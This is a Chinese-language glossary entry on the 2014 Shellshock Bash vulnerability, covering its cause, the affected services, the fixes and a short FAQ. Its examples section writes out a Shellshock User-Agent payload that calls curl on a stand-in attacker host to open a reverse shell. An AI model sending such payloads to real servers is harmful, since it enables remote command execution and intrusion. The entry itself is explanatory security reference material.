Shellshock (CVE-2014-6271)

Q: Shellshock (CVE-2014-6271) 是什么?

2014 年披露的 GNU Bash 漏洞,攻击者通过让其他程序向 Bash 传入特制环境变量即可执行任意命令。 它属于网络安全的 漏洞 分类。

审核人Florian AmetteCybersecurity entrepreneur & security researcher

Shellshock (CVE-2014-6271) 是什么?

Shellshock (CVE-2014-6271)2014 年披露的 GNU Bash 漏洞,攻击者通过让其他程序向 Bash 传入特制环境变量即可执行任意命令。

Shellshock(CVE-2014-6271 及相关的 CVE-2014-7169)源自 GNU Bash 解析存储在环境变量中的函数定义时的缺陷:函数体之后的命令会在 Shell 启动时被执行。许多服务(CGI 脚本、DHCP 客户端、OpenSSH ForceCommand、qmail 等)都会在攻击者可控的环境变量下调用 Bash,因此该漏洞极易被远程利用,常以 root 身份执行。2014 年的披露引发了全球范围的紧急打补丁与僵尸网络、Webshell、蠕虫的大规模利用。修复需要将 Bash 升级至已修复的版本、淘汰传统的 Bash-CGI 架构,并通过降权与限制环境变量传递等手段做纵深防御。

● 示例

01
向 Bash-CGI 端点发送 User-Agent: () { :; }; /bin/curl attacker.com 触发反向 Shell。
02
利用 DHCP 客户端将选项字符串导出到 Bash 钩子脚本的环境中。

● 常见问题

Shellshock (CVE-2014-6271) 是什么?

2014 年披露的 GNU Bash 漏洞,攻击者通过让其他程序向 Bash 传入特制环境变量即可执行任意命令。它属于网络安全的漏洞分类。

Shellshock (CVE-2014-6271) 是什么意思?

2014 年披露的 GNU Bash 漏洞,攻击者通过让其他程序向 Bash 传入特制环境变量即可执行任意命令。

如何防御 Shellshock (CVE-2014-6271)?

针对 Shellshock (CVE-2014-6271) 的防御通常结合技术控制与运营实践,详见上方完整定义。

Shellshock (CVE-2014-6271) 还有哪些其他名称?

常见的别称包括: Bashdoor, CVE-2014-6271。